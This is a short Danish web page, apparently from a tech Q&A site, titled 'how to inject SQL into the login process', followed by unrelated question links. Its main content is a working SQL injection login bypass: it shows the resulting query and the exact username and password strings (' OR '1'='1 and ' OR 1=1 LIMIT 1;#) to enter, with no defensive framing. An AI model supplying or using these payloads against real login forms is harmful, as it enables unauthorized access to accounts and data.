sql >> Database teknologi >  >> RDS >> Mysql

hvordan man injicerer sql i login-processen

Startende med målforespørgslen:

SELECT   *
FROM     users
WHERE    username = '' OR '1'='1' 
AND      password = '' OR 1=1 LIMIT 1;#'

Vi får brugernavnet ' OR '1'='1 og adgangskoden er ' OR 1=1 LIMIT 1;#



  1. CakePHP gemmer HABTM-data

  2. java.sql.SQLException:Adgang nægtet for brugeren 'root'@'localhost' (ved hjælp af adgangskode:JA)

  3. Google Maps API v3 afkrydsningsfelt / filterdatabase

  4. python kodning mysql :(